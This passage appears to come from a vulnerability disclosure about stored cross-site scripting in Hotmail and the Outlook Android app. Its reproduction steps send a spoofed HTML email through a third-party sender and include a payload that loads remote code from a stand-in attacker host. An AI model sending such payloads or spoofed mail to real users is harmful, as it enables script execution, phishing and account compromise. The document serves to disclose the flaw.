Steps To Reproduce :
1. Go To https://emkei.cz/ ( I use this site to send messages because it allows me to send messages with Content Type “text/html” ) 2. Add Any Things in ( From E-Name And From E-mail And Subject ) 3. Add Your Email Hotmail Test On Input ( To ) 4. Click On text/html In Content-Type 5. Put ( <link rel=import href=https://Evilcom/filepayload> ) On Input ( Text ) And Submit 6. And Sign In To Your Email Hotmail Test 7. And Click On The Message And The Payload Will Executed !
Proof Of Concept :
Bug 2 : XSS Stored In com.microsoft.office.outlook
After they fixed the first Bug , I downloaded their application on Android [ com.microsoft.office.outlook ] and tried to send to a message containing a Simple XSS Payload the same first way and the sudden thing is that the message is not filtered at all and All html tags is printed without filter